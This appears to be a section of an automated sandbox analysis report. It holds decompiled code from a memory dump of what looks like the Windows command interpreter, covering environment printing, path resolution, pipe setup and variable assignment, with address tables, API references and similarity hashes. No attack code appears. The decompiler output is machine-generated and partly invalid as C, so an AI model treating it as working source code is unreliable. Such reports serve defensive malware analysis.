						_t28 = _t9 >> 1;
						if(_t9 == 0) {
							break;
						}
						if( *0x4a7541b4 != 0) {
							_t12 = 1;
							L12:
							return _t12;
						}
						if( *_t26 != 0x3d) {
							E4A7358F3(L"%s\r\n", _t26);
						}
						_t26 = _t26 + 2 + _t28 * 2;
						_t13 = _t26;
						_t25 = _t13 + 2;
						do {
							_t22 =  *_t13;
							_t13 = _t13 + 2;
						} while (_t22 != 0);
					}
					_t12 = 0;
					goto L12;
				}
				_push("Null environment");
				fprintf(__imp___iob + 0x40, "\nCMD Internal Error %s\n");
				return 1;
			}

0x4a74c93c
0x4a74c941
0x4a74c964
0x4a74c966
0x4a74c969
0x4a74c969
0x4a74c96d
0x4a74c96e
0x4a74c9a5
0x4a74c9a5
0x4a74c9a9
0x4a74c9ab
0x00000000
0x00000000
0x4a74c97d
0x4a74c9b7
0x4a74c9af
0x00000000
0x4a74c9af
0x4a74c983
0x4a74c98b
0x4a74c991
0x4a74c992
0x4a74c996
0x4a74c998
0x4a74c99b
0x4a74c99b
0x4a74c99f
0x4a74c9a0
0x4a74c99b
0x4a74c9ad
0x00000000
0x4a74c9ad
0x4a74c948
0x4a74c956
0x00000000

APIs

fprintf.MSVCRT ref: 4A74C956

Strings

Null environment, xrefs: 4A74C948
%s, xrefs: 4A74C986
CMD Internal Error %s, xrefs: 4A74C950

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: fprintf
String ID: CMD Internal Error %s$%s$Null environment
API String ID: 383729395-2781220306
Opcode ID: 2795cfd8dfd545ad1f74748c0088f092dae200d51f556eec2872332c5de8a063
Instruction ID: f60b3768b03c1901a5d043a4798995d154c1b01f85ff13dd6d2838a350a5bb54
Opcode Fuzzy Hash: 2795cfd8dfd545ad1f74748c0088f092dae200d51f556eec2872332c5de8a063
Instruction Fuzzy Hash: 1D014C7724D142FAD7B057549804A933FB8EBCA3A3B068221E452DF240FA70D50DC7D0

Uniqueness

Uniqueness Score: -1.00%

Function 4A741CA5, Relevance: 6.4, APIs: 4, Instructions: 357
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E4A741CA5(signed int __ecx, intOrPtr* __edx, long _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				short _v528;
				WCHAR* _v532;
				signed int _v536;
				void* _v540;
				intOrPtr _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t97;
				intOrPtr _t99;
				WCHAR* _t101;
				WCHAR* _t105;
				WCHAR* _t106;
				signed int _t109;
				signed int _t115;
				void* _t118;
				void* _t122;
				void* _t125;
				void* _t129;
				WCHAR* _t133;
				signed int _t136;
				void _t140;
				intOrPtr* _t145;
				void* _t152;
				intOrPtr* _t155;
				intOrPtr* _t159;
				void _t164;
				signed int _t167;
				void* _t179;
				short* _t180;
				WCHAR* _t185;
				void* _t188;
				short* _t190;
				void* _t191;
				short _t193;
				intOrPtr* _t194;
				void _t201;
				void _t202;
				short _t203;
				void* _t204;
				void* _t210;
				void* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int _t219;
				short _t221;
				short _t222;
				short* _t223;
				void* _t224;
				short* _t225;
				void* _t226;
				intOrPtr _t227;
				void* _t228;
				void* _t229;
				void* _t230;
				void* _t231;
				signed int _t238;

				_t220 = __edx;
				_t189 = __ecx;
				_t97 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t97 ^ _t238;
				_t99 = _a8;
				_v536 = _v536 & 0x00000000;
				_t185 = _a12;
				_t232 = _a4;
				_t229 =  *(_t99 + 0x20);
				_v548 = _t99;
				_v532 = _t185;
				_v540 = _t229;
				if(_t229 == 0) {
					E4A73185A(_t185, _a16, 0x4a755260);
					_t101 = _t185;
					_t190 =  &(_t101[1]);
					do {
						_t221 =  *_t101;
						_t101 =  &(_t101[1]);
					} while (_t221 != 0);
					_t222 =  *0x4a770664; // 0x5c
					_t105 =  &(_t185[_t101 - _t190 >> 1]);
					_t191 = _t185;
					if(_t185 >= _t105) {
						L24:
						 *_t105 = _t222;
						_t105[1] = 0;
						L25:
						if(( *(_t232 + 0x1c) & 0x00000200) == 0) {
							L38:
							_t106 = _t185;
							_t223 =  &(_t106[1]);
							do {
								_t193 =  *_t106;
								_t106 =  &(_t106[1]);
							} while (_t193 != 0);
							_t220 =  *((intOrPtr*)(_t232 + 0x18)) + 0x2c;
							_t194 = _t220;
							_t109 = _t106 - _t223 >> 1;
							_t232 = _t194 + 2;
							do {
								_t229 =  *_t194;
								_t194 = _t194 + 2;
							} while (_t229 != 0);
							if((_t194 - _t232 >> 1) + _t109 + 1 > 0x104) {
								goto L74;
							}
							_push(_t220);
							goto L44;
						} else {
							_t229 =  *((intOrPtr*)(_t232 + 0x18)) + 0x234;
							_t125 = _t229;
							_t224 = _t125 + 2;
							do {
								_t201 =  *_t125;
								_t125 = _t125 + 2;
							} while (_t201 != 0);
							if(_t125 == _t224) {
								goto L38;
							}
							_t129 = _t229;
							_t220 = _t129 + 2;
							do {
								_t202 =  *_t129;
								_t129 = _t129 + 2;
							} while (_t202 != 0);
							if(_t129 == _t220) {
								L74:
								_v536 = 1;
								L6:
								if(_a20 == 0) {
									L10:
									return E4A7313A9(_v536, _t185, _v8 ^ _t238, _t220, _t229, _t232);
								}
								_t200 = _v540;
								if(_t200 == 0 || ( *(_t200 + 0x1c) & 0x00002000) == 0) {
									_t200 = _v548;
									if(( *(_v548 + 0x1c) & 0x00002000) != 0) {
										goto L75;
									}
								} else {
									L75:
									_t229 = CreateFileW(_t185, 0x80000000, 1, 0, 3, 0x80, 0);
									if(_t229 != 0xffffffff) {
										_t115 = GetFileType(_t229);
										asm("sbb esi, esi");
										_t232 =  ~((_t115 & 0xffff7fff) - 1) + 1;
										CloseHandle(_t229);
										if( ~((_t115 & 0xffff7fff) - 1) + 1 != 0) {
											_t118 = E4A74FE1B(_t185, _t200, _t220, _t229, _t185, 0x400023d3, 0x400023d4);
											if(_t118 == 0) {
												 *_t185 = 0;
											} else {
												if(_t118 == 0) {
													_t122 = _v540;
													if(_t122 == 0) {
														_t122 = _v548;
													}
													 *(_t122 + 0x1c) =  *(_t122 + 0x1c) & 0xffffdfff;
												}
											}
										}
									}
								}
								goto L10;
							}
							_t133 = _t185;
							_t225 =  &(_t133[1]);
							do {
								_t203 =  *_t133;
								_t133 =  &(_t133[1]);
							} while (_t203 != 0);
							_t204 = _t229;
							_t136 = _t133 - _t225 >> 1;
							_t220 = _t204 + 2;
							do {
								_t232 =  *_t204;
								_t204 = _t204 + 2;
							} while (_t232 != 0);
							if((_t204 - _t220 >> 1) + _t136 + 1 > 0x104) {
								goto L74;
							}
							_push(_t229);
							L44:
							_push(_a16);
							_push(_t185);
							E4A7320A9(_t232);
							goto L6;
						}
					} else {
						goto L19;
					}
					do {
						L19:
						if( *_t191 == _t222) {
							_t229 = _t191;
						}
						_t191 = _t191 + 2;
					} while (_t191 < _t105);
					if(_t229 == 0 || _t229 < _t105 - 2) {
						goto L24;
					} else {
						goto L25;
					}
				}
				if( *((short*)(E4A732ED1( *_t229))) == 0x3a) {
					if(( *(_t232 + 0x1c) & 0x00000200) == 0) {
						L59:
						_t186 =  *_v540;
						_t140 =  *_v540;
						_t226 = _t140 + 2;
						do {
							_t210 =  *_t140;
							_t140 = _t140 + 2;
						} while (_t210 != 0);
						_t229 = _t140 - _t226 >> 1;
						_t145 =  *((intOrPtr*)(_t232 + 0x18)) + 0x2c;
						_t211 = _t145 + 2;
						do {
							_t220 =  *_t145;
							_t145 = _t145 + 2;
						} while (_t220 != 0);
						if((_t145 - _t211 >> 1) + _t229 + 1 > 0x104) {
							L58:
							_t185 = _v532;
							goto L74;
						}
						E4A73185A(_v532, _a16, _t186);
						_t152 =  *((intOrPtr*)(_t232 + 0x18)) + 0x2c;
						L65:
						E4A7320A9(_t232, _v532, _a16, _t152);
						_t185 = _v532;
						goto L6;
					}
					_t212 =  *((intOrPtr*)(_t232 + 0x18)) + 0x234;
					_t155 = _t212;
					_t230 = _t155 + 2;
					do {
						_t227 =  *_t155;
						_t155 = _t155 + 2;
					} while (_t227 != 0);
					if(_t155 == _t230) {
						goto L59;
					}
					_t159 = _t212;
					_t229 = _t159 + 2;
					do {
						_t220 =  *_t159;
						_t159 = _t159 + 2;
					} while (_t220 != 0);
					if(_t159 == _t229) {
						goto L58;
					}
					_t187 =  *_v540;
					_t164 =  *_v540;
					_t231 = _t164 + 2;
					do {
						_t228 =  *_t164;
						_t164 = _t164 + 2;
					} while (_t228 != 0);
					_t167 = _t164 - _t231 >> 1;
					_t220 = _t212 + 2;
					do {
						_t229 =  *_t212;
						_t212 = _t212 + 2;
					} while (_t229 != 0);
					if((_t212 - _t220 >> 1) + _t167 + 1 > 0x104) {
						goto L58;
					}
					E4A73185A(_v532, _a16, _t187);
					_t152 =  *((intOrPtr*)(_t232 + 0x18)) + 0x234;
					goto L65;
				}
				if(_a20 == 0 ||  *((short*)(E4A732ED1( *_t229))) != 0x2a ||  *((short*)(E4A742348( *_t229))) != 0x5c) {
					L4:
					_t185 = _v532;
					if(E4A741D9B(_t189, _t185, _a16,  *_v540,  *((intOrPtr*)(_t232 + 4))) != 0) {
						E4A74056B(_t172);
						_v536 = 1;
					}
					_t232 = 0x104;
					if(GetFullPathNameW(_t185, 0x104,  &_v528, 0) > 0x104) {
						E4A74056B(0x6f);
						goto L74;
					} else {
						goto L6;
					}
				} else {
					_t179 = E4A732148( *((intOrPtr*)(_t232 + 4)), 0x5c);
					if(_t179 == 0) {
						_t180 =  *((intOrPtr*)(_t232 + 4));
						if( *((short*)(_t180 + 2)) == 0x3a) {
							_t180 = _t180 + 4;
						}
					} else {
						_t180 = _t179 + 2;
					}
					if(( *(_t232 + 0x1c) & 0x00000200) != 0) {
						_t220 = 0x234;
						_t217 =  *((intOrPtr*)(_t232 + 0x18)) + 0x234;
						_t188 = _t217 + 2;
						do {
							_t229 =  *_t217;
							_t217 = _t217 + 2;
						} while (_t229 != 0);
						_t219 = _t217 - _t188;
						_t189 = _t219 >> 1;
						if(_t219 != 0) {
							_t189 = 0;
							 *_t180 = 0;
							E4A7320A9(_t232,  *((intOrPtr*)(_t232 + 4)),  *((intOrPtr*)(_t232 + 8)),  *((intOrPtr*)(_t232 + 0x18)) + 0x234);
						}
					}
					goto L4;
				}
			}

0x4a741ca5
0x4a741ca5
0x4a741cb0
0x4a741cb7
0x4a741cba
0x4a741cbd
0x4a741cc5
0x4a741cc9
0x4a741ccd
0x4a741cd0
0x4a741cd6
0x4a741cdc
0x4a741ce4
0x4a74886d
0x4a748872
0x4a748874
0x4a748877
0x4a748877
0x4a74887b
0x4a74887c
0x4a748881
0x4a74888c
0x4a74888f
0x4a748893
0x4a7488ad
0x4a7488af
0x4a7488b2
0x4a7488b6
0x4a7488bd
0x4a74892e
0x4a74892e
0x4a748930
0x4a748933
0x4a748933
0x4a748937
0x4a748938
0x4a748942
0x4a748945
0x4a748947
0x4a748949
0x4a74894c
0x4a74894c
0x4a748950
0x4a748951
0x4a748963
0x00000000
0x00000000
0x4a748969
0x00000000
0x4a7488bf
0x4a7488c2
0x4a7488c8
0x4a7488ca
0x4a7488cd
0x4a7488cd
0x4a7488d1
0x4a7488d2
0x4a7488db
0x00000000
0x00000000
0x4a7488dd
0x4a7488df
0x4a7488e2
0x4a7488e2
0x4a7488e6
0x4a7488e7
0x4a7488f0
0x4a748aef
0x4a748aef
0x4a741d52
0x4a741d56
0x4a741d7f
0x4a741d93
0x4a741d93
0x4a741d58
0x4a741d65
0x4a741d70
0x4a741d79
0x00000000
0x00000000
0x4a748afe
0x4a748afe
0x4a748b17
0x4a748b1c
0x4a748b23
0x4a748b34
0x4a748b37
0x4a748b38
0x4a748b40
0x4a748b56
0x4a748b59
0x4a748b81
0x4a748b5b
0x4a748b5d
0x4a748b63
0x4a748b6b
0x4a748b6d
0x4a748b6d
0x4a748b73
0x4a748b73
0x4a748b5d
0x4a748b59
0x4a748b40
0x4a748b1c
0x00000000
0x4a741d65
0x4a7488f6
0x4a7488f8
0x4a7488fb
0x4a7488fb
0x4a7488ff
0x4a748900
0x4a748907
0x4a748909
0x4a74890b
0x4a74890e
0x4a74890e
0x4a748912
0x4a748913
0x4a748925
0x00000000
0x00000000
0x4a74892b
0x4a74896a
0x4a74896a
0x4a74896d
0x4a74896e
0x00000000
0x4a74896e
0x00000000
0x00000000
0x00000000
0x4a748895
0x4a748895
0x4a748898
0x4a74889a
0x4a74889a
0x4a74889d
0x4a74889e
0x4a7488a4
0x00000000
0x00000000
0x00000000
0x00000000
0x4a7488a4
0x4a741cf5
0x4a74897f
0x4a748a13
0x4a748a19
0x4a748a1b
0x4a748a1d
0x4a748a20
0x4a748a20
0x4a748a24
0x4a748a25
0x4a748a2e
0x4a748a33
0x4a748a36
0x4a748a39
0x4a748a39
0x4a748a3d
0x4a748a3e
0x4a748a50
0x4a748a08
0x4a748a08
0x00000000
0x4a748a08
0x4a748a5c
0x4a748a64
0x4a748a67
0x4a748a71
0x4a748a76
0x00000000
0x4a748a76
0x4a748988
0x4a74898e
0x4a748990
0x4a748993
0x4a748993
0x4a748997
0x4a748998
0x4a7489a1
0x00000000
0x00000000
0x4a7489a3
0x4a7489a5
0x4a7489a8
0x4a7489a8
0x4a7489ac
0x4a7489ad
0x4a7489b6
0x00000000
0x00000000
0x4a7489be
0x4a7489c0
0x4a7489c2
0x4a7489c5
0x4a7489c5
0x4a7489c9
0x4a7489ca
0x4a7489d1
0x4a7489d3
0x4a7489d6
0x4a7489d6
0x4a7489da
0x4a7489db
0x4a7489ed
0x00000000
0x00000000
0x4a7489f9
0x4a748a01
0x00000000
0x4a748a01
0x4a741cff
0x4a741d12
0x4a741d1d
0x4a741d2e
0x4a748ad4
0x4a748ad9
0x4a748ad9
0x4a741d3d
0x4a741d4c
0x4a748aea
0x00000000
0x00000000
0x00000000
0x00000000
0x4a74231d
0x4a742322
0x4a742329
0x4a748a81
0x4a748a89
0x4a748a8f
0x4a748a8f
0x4a74232f
0x4a742330
0x4a742330
0x4a742338
0x4a748a9a
0x4a748a9f
0x4a748aa1
0x4a748aa4
0x4a748aa4
0x4a748aa8
0x4a748aa9
0x4a748aae
0x4a748ab0
0x4a748ab2
0x4a748ab8
0x4a748aba
0x4a748ac9
0x4a748ac9
0x4a748ab2
0x00000000
0x4a742338

APIs

GetFullPathNameW.KERNEL32(?,00000104,?,00000000,?,00000000,?,?,?,00000000,00000104,?), ref: 4A741D44

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: FullNamePath
String ID:
API String ID: 608056474-0
Opcode ID: 4414b4593afb1d749c98e5e71e7f3fc2346c5d81825c65d567a94f69ba702faf
Instruction ID: 48317346f77df8761a3bfa2b914fd8741b18bf2fb7c37f272cdbfc8382ac49b7
Opcode Fuzzy Hash: 4414b4593afb1d749c98e5e71e7f3fc2346c5d81825c65d567a94f69ba702faf
Instruction Fuzzy Hash: 8DC15731604A0ADBD775DF18C888BE67BB5EF04344F0645A8D946DB262DB74EA4DCB80

Uniqueness

Uniqueness Score: -1.00%

Function 4A73CBC3, Relevance: 6.2, APIs: 4, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E4A73CBC3(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				short _v16;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v28;
				void* __ebx;
				struct _CONSOLE_SCREEN_BUFFER_INFO* __ecx;
				void* __edi;
				void** __esi;
				char _t39;
				intOrPtr _t41;
				intOrPtr _t45;
				intOrPtr _t55;

				_push(_t48);
				_t39 = _a4;
				_t45 =  *((intOrPtr*)(_t39 + 0x38));
				_v12 =  *((intOrPtr*)(_t39 + 0x3c));
				_t41 = E4A731896(0x28);
				_t55 = _t41;
				if(_t55 == 0) {
					L24:
					goto L21;
				} else {
					__imp___pipe(__esi, 0, 0x8000);
					__esp = __esp + 0xc;
					__eflags = __eax;
					if(__eax != 0) {
						_push(0);
						__eax = E4A736D44(__ecx);
						__ecx = 8;
						_pop(__ecx);
						goto L24;
					} else {
						E4A733B3E( *__esi) = E4A733B3E(__esi[1]);
						__eax =  *0x4a754184; // 0x0
						 *0x4a754184 =  *0x4a754184 + 1;
						__eflags = __eax;
						if(__eax != 0) {
							__eax =  *0x4a75410c; // 0x0
							 *(__eax + 0x24) = __esi;
							__eax =  *0x4a75410c; // 0x0
							__esi[8] = __eax;
							__esi[9] = 0;
							 *0x4a75410c = __esi;
						} else {
							 *0x4a75410c = __esi;
							 *0x4a754108 = __esi;
							__esi[8] = 0;
						}
						__eax = E4A734794(__eax, 1);
						__esi[3] = __eax;
						__eflags = __eax - 0xffffffff;
						if(__eax == 0xffffffff) {
							__esi[3] = __esi[3] | __eax;
							__eax = E4A74EA5F(__ecx, __edi, __esi);
						}
						__eax = E4A7346D3(__eax, __esi[1], 1);
						__eflags = __eax - 0xffffffff;
						if(__eax == 0xffffffff) {
							__eax = E4A74EA5F(__ecx, __edi, __esi);
						}
						__eax = E4A733AB3(__esi[1]);
						__esi[1] = __edi;
						__eflags =  *__ebx - __edi;
						if( *__ebx <= __edi) {
							 &_a4 = E4A7341DD(__ebx,  &_a4);
						}
						__eax = E4A731492(1, __ebx);
						_v8 = __eax;
						__eflags =  *0x4a754180 - __edi; // 0x0
						if(__eflags != 0) {
							__imp___get_osfhandle( *__esi, __edi, __edi, __edi, __edi, 1);
							_pop(__ecx);
							__eax = DuplicateHandle( *0x4a754180, __eax, ??, ??, ??, ??, ??);
						}
						__eax = E4A7346D3(__eax, __esi[3], 1);
						__ebx = __ebx | 0xffffffff;
						__eflags = __eax - __ebx;
						if(__eax == __ebx) {
							__eax = E4A74EA5F(__ecx, __edi, __esi);
						}
						__eax = E4A733AB3(__esi[3]);
						__esi[3] = __edi;
						__eflags = _v8 - __edi;
						if(_v8 != __edi) {
							 *0x4a770908 = 2;
							__eax = E4A74FCA6(__ebx, __ecx, __edx, __edi, __esi);
						}
						__eax =  *0x4a754180; // 0x0
						__esi[4] = __eax;
						__eax =  *0x4a7541bc; // 0x0
						__esi[6] = __eax;
						 *0x4a754180 = __edi;
						 *0x4a7541bc = __edi;
						__eax = E4A734794(__eax, __edi);
						__esi[2] = __eax;
						__eflags = __eax - __ebx;
						if(__eax == __ebx) {
							__esi[2] = __ebx;
							__eax = E4A74EA5F(__ecx, __edi, __esi);
						}
						__eax = E4A7346D3(__eax,  *__esi, __edi);
						__eflags = __eax - __ebx;
						if(__eax == __ebx) {
							__eax = E4A74EA5F(__ecx, __edi, __esi);
						}
						__eax = E4A733AB3( *__esi);
						__ebx = _v12;
						 *__esi = __edi;
						__eflags =  *__ebx - __edi;
						if( *__ebx <= __edi) {
							 &_a4 = E4A7341DD(__ebx,  &_a4);
						}
						__eax = E4A731492(1, __ebx);
						__ebx = __eax;
						__eax = E4A7346D3(__eax, __esi[2], __edi);
						__eflags = __eax - 0xffffffff;
						if(__eax == 0xffffffff) {
							__eax = E4A74EA5F(__ecx, __edi, __esi);
						}
						__eax = E4A733AB3(__esi[2]);
						__esi[2] = __edi;
						__eflags = __ebx - __edi;
						if(__ebx != __edi) {
							 *0x4a770908 = 2;
							__eax = E4A74FCA6(__ebx, __ecx, __edx, __edi, __esi);
							asm("int3");
							__ecx =  &_v28;
							__eax = GetConsoleScreenBufferInfo(__eax,  &_v28);
							__eflags = __eax;
							if(__eax != 0) {
								__eax = _v16;
								__esi = _v12;
								__ebx = _v28.dwSize;
								_v12 - _v16 = _v12 - _v16 + 1;
							}
							 *0x0000001C = _t55;
							 *0x00000020 = _t45;
							return _t41;
						} else {
							__eax =  *0x4a754180; // 0x0
							__esi[5] = __eax;
							__eax =  *0x4a7541bc; // 0x0
							__esi[7] = __eax;
							 *0x4a754184 =  *0x4a754184 - 1;
							__eflags =  *0x4a754184;
							 *0x4a754180 = __edi;
							 *0x4a7541bc = __edi;
							if( *0x4a754184 != 0) {
								__eax = __ebx;
							} else {
								__eax = E4A73CD8B();
							}
							L21:
							return 1;
						}
					}
				}
			}

0x4a73cbc9
0x4a73cbca
0x4a73cbce
0x4a73cbd8
0x4a73cbdb
0x4a73cbe0
0x4a73cbe6
0x4a747876
0x00000000
0x4a73cbec
0x4a73cbf3
0x4a73cbf9
0x4a73cbfc
0x4a73cbfe
0x4a74787e
0x4a747881
0x4a747886
0x4a747887
0x00000000
0x4a73cc04
0x4a73cc0e
0x4a73cc13
0x4a73cc18
0x4a73cc1e
0x4a73cc20
0x4a740c2e
0x4a740c33
0x4a740c36
0x4a740c3b
0x4a740c3e
0x4a740c41
0x4a73cc26
0x4a73cc26
0x4a73cc2c
0x4a73cc32
0x4a73cc32
0x4a73cc37
0x4a73cc3c
0x4a73cc3f
0x4a73cc42
0x4a74788a
0x4a74788d
0x4a74788d
0x4a73cc4d
0x4a73cc52
0x4a73cc55
0x4a747897
0x4a747897
0x4a73cc5e
0x4a73cc63
0x4a73cc66
0x4a73cc68
0x4a73cc6f
0x4a73cc6f
0x4a73cc77
0x4a73cc7c
0x4a73cc7f
0x4a73cc85
0x4a73cc8f
0x4a73cc95
0x4a73cc9d
0x4a73cc9d
0x4a73cca8
0x4a73ccad
0x4a73ccb0
0x4a73ccb2
0x4a7478a1
0x4a7478a1
0x4a73ccbb
0x4a73ccc0
0x4a73ccc3
0x4a73ccc6
0x4a7478ab
0x4a7478b5
0x4a7478b5
0x4a73cccc
0x4a73ccd1
0x4a73ccd4
0x4a73ccd9
0x4a73ccdd
0x4a73cce3
0x4a73cce9
0x4a73ccee
0x4a73ccf1
0x4a73ccf3
0x4a7478bf
0x4a7478c2
0x4a7478c2
0x4a73ccfc
0x4a73cd01
0x4a73cd03
0x4a7478cc
0x4a7478cc
0x4a73cd0b
0x4a73cd10
0x4a73cd13
0x4a73cd15
0x4a73cd17
0x4a73cd1e
0x4a73cd1e
0x4a73cd26
0x4a73cd2f
0x4a73cd31
0x4a73cd36
0x4a73cd39
0x4a7478d6
0x4a7478d6
0x4a73cd42
0x4a73cd47
0x4a73cd4a
0x4a73cd4c
0x4a7478e0
0x4a7478ea
0x4a7478ef
0x4a7478f0
0x4a7478f5
0x4a7478fb
0x4a7478fd
0x4a747903
0x4a747907
0x4a74790b
0x4a747911
0x4a747911
0x4a73b401
0x4a73b404
0x4a73b40b
0x4a73cd52
0x4a73cd52
0x4a73cd57
0x4a73cd5a
0x4a73cd5f
0x4a73cd62
0x4a73cd62
0x4a73cd68
0x4a73cd6e
0x4a73cd74
0x4a740c4c
0x4a73cd7a
0x4a73cd7a
0x4a73cd7a
0x4a73cd7f
0x4a73cd83
0x4a73cd83
0x4a73cd4c
0x4a73cbfe

APIs

Part of subcall function 4A731896: GetProcessHeap.KERNEL32(00000008,4A7325C0,4A7325BB,?,4A7319FD,4A7325BA,00000001,00000000,?,4A737037,4A7325B8,4A737238,00000228,4A736C92,4A7325B8,?), ref: 4A7318A9
Part of subcall function 4A731896: HeapAlloc.KERNEL32(00000000,?,4A7319FD,4A7325BA,00000001,00000000,?,4A737037,4A7325B8,4A737238,00000228,4A736C92,4A7325B8,?,?,4A736CE6), ref: 4A7318B0

_pipe.MSVCRT ref: 4A73CBF3

Part of subcall function 4A734794: _dup.MSVCRT ref: 4A73479D

Part of subcall function 4A7346D3: _dup2.MSVCRT ref: 4A7346E4

Part of subcall function 4A733AB3: _close.MSVCRT ref: 4A733AED

_get_osfhandle.MSVCRT ref: 4A73CC8F
DuplicateHandle.KERNEL32 ref: 4A73CC9D

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Heap$AllocDuplicateHandleProcess_close_dup_dup2_get_osfhandle_pipe
String ID:
API String ID: 2751104949-0
Opcode ID: 3768905cf307fe4ff35d8fff94006d7e6d6f6925abf9dc8417109737c893c6a1
Instruction ID: 4fe73a7530f843a8586fb844e15661722546cc91ed36e1762e1cff7031ada532
Opcode Fuzzy Hash: 3768905cf307fe4ff35d8fff94006d7e6d6f6925abf9dc8417109737c893c6a1
Instruction Fuzzy Hash: 726104B1A48B11EFD7309FA1C88999ABFFCFB42310B12852EE455CA952E770985CCF50

Uniqueness

Uniqueness Score: -1.00%

Function 4A735A56, Relevance: 6.2, APIs: 4, Instructions: 164
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E4A735A56(intOrPtr _a4) {
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr* _t13;
				intOrPtr* _t21;
				intOrPtr* _t27;
				signed int _t32;
				signed int _t37;
				signed int _t38;
				wchar_t* _t39;
				wchar_t* _t40;
				long _t43;
				short* _t44;
				void* _t46;
				void* _t47;
				intOrPtr _t51;
				void* _t54;
				void* _t56;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				intOrPtr* _t60;
				intOrPtr* _t61;
				void* _t62;
				wchar_t* _t65;

				_t10 = _a4;
				if( *0x4a754081 == 0) {
					_t60 = E4A7322CA( *(_t10 + 0x3c), 0x4a74bd20, 3);
					_t43 = 0;
					if( *_t60 == 0) {
						L22:
						return E4A74C936( *0x4a7541c4);
					}
					_t48 = _t60;
					do {
						_t13 = _t48;
						_t4 = _t13 + 2; // 0x2
						_t62 = _t4;
						do {
							_t57 =  *_t13;
							_t13 = _t13 + 2;
						} while (_t57 != 0);
						_t48 = _t48 + 2 + (_t13 - _t62 >> 1) * 2;
						_t43 = _t43 + 1;
					} while ( *_t48 != _t57);
					if(_t43 > 3) {
						L36:
						_push(0);
						_push(0x232a);
						E4A736D44(_t48);
						return 1;
					}
					_t44 = E4A73413B(_t60);
					if( *_t44 != 0x3d) {
						goto L36;
					}
					_t21 = _t60;
					_t8 = _t21 + 2; // 0x2
					_t58 = _t8;
					do {
						_t51 =  *_t21;
						_t21 = _t21 + 2;
					} while (_t51 != 0);
					E4A73185A(_t60, (_t21 - _t58 >> 1) + 1, E4A732598(_t51, _t60));
					_t27 = _t60;
					_t9 = _t27 + 2; // 0x2
					_t59 = _t9;
					do {
						_t48 =  *_t27;
						_t27 = _t27 + 2;
					} while (_t48 != 0);
					if(_t27 == _t59) {
						goto L36;
					}
					_push(_t44 + 4);
					_push(_t60);
					L13:
					return E4A731730();
				}
				_t65 =  *(_t10 + 0x3c);
				if(_t65 == 0) {
					goto L22;
				}
				_t32 =  *_t65 & 0x0000ffff;
				if(_t32 == 0) {
					goto L22;
				}
				while(_t32 <= 0x20) {
					_t65 =  &(_t65[0]);
					_t32 =  *_t65 & 0x0000ffff;
					if(_t32 != 0) {
						continue;
					}
					break;
				}
				if( *_t65 == 0) {
					goto L22;
				}
				_t61 = __imp___wcsnicmp;
				_t46 = 2;
				_push(_t46);
				_push(0x4a754650);
				_push(_t65);
				if( *_t61() == 0) {
					return E4A73EC28(_t47,  &(_t65[1]));
				}
				_push(_t46);
				_push(0x4a754658);
				_push(_t65);
				if( *_t61() == 0) {
					return E4A74CB35(_t56, _t61,  &(_t65[1]),  &(_t65[1]));
				}
				_t37 =  *_t65 & 0x0000ffff;
				if(_t37 == 0x2f) {
					goto L36;
				}
				if(_t37 == 0x22) {
					while(1) {
						_t65 = _t65 + _t46;
						_t38 =  *_t65 & 0x0000ffff;
						if(_t38 == 0) {
							break;
						}
						if(_t38 > 0x20) {
							break;
						}
					}
					_t39 = wcsrchr(_t65, 0x22);
					_pop(_t48);
					if(_t39 != 0) {
						_t48 = 0;
						 *_t39 = 0;
					}
				}
				if( *_t65 == 0x3d) {
					goto L36;
				}
				_t40 = wcschr(_t65, 0x3d);
				_pop(_t54);
				if(_t40 == 0) {
					return E4A74C9D2(_t54, _t65);
				}
				 *_t40 = 0;
				_push( &(_t40[0]));
				_push(_t65);
				goto L13;
			}

0x4a735a62
0x4a735a68
0x4a7454cf
0x4a7454d1
0x4a7454d6
0x4a7454b0
0x00000000
0x4a7454b6
0x4a7454d8
0x4a7454da
0x4a7454da
0x4a7454dc
0x4a7454dc
0x4a7454df
0x4a7454df
0x4a7454e3
0x4a7454e4
0x4a7454ed
0x4a7454f1
0x4a7454f2
0x4a7454fa
0x4a74554d
0x4a74554d
0x4a74554f
0x4a745554
0x00000000
0x4a74555d
0x4a745502
0x4a745508
0x00000000
0x00000000
0x4a74550a
0x4a74550c
0x4a74550c
0x4a74550f
0x4a74550f
0x4a745513
0x4a745514
0x4a745529
0x4a74552e
0x4a745530
0x4a745530
0x4a745533
0x4a745533
0x4a745537
0x4a745538
0x4a745541
0x00000000
0x00000000
0x4a745546
0x4a745547
0x4a735b0e
0x00000000
0x4a735b0e
0x4a735a6e
0x4a735a73
0x00000000
0x00000000
0x4a735a79
0x4a735a7f
0x00000000
0x00000000
0x4a735a85
0x4a735a8c
0x4a735a8d
0x4a735a93
0x00000000
0x00000000
0x00000000
0x4a735a93
0x4a735a99
0x00000000
0x00000000
0x4a735a9f
0x4a735aa7
0x4a735aa8
0x4a735aa9
0x4a735aae
0x4a735ab6
0x00000000
0x4a73ec19
0x4a735abc
0x4a735abd
0x4a735ac2
0x4a735aca
0x00000000
0x4a74546e
0x4a735ad0
0x4a735ad7
0x00000000
0x00000000
0x4a735ae1
0x4a74547e
0x4a74547e
0x4a745480
0x4a745486
0x00000000
0x00000000
0x4a74547c
0x00000000
0x00000000
0x4a74547c
0x4a74548b
0x4a745492
0x4a745495
0x4a74549b
0x4a74549d
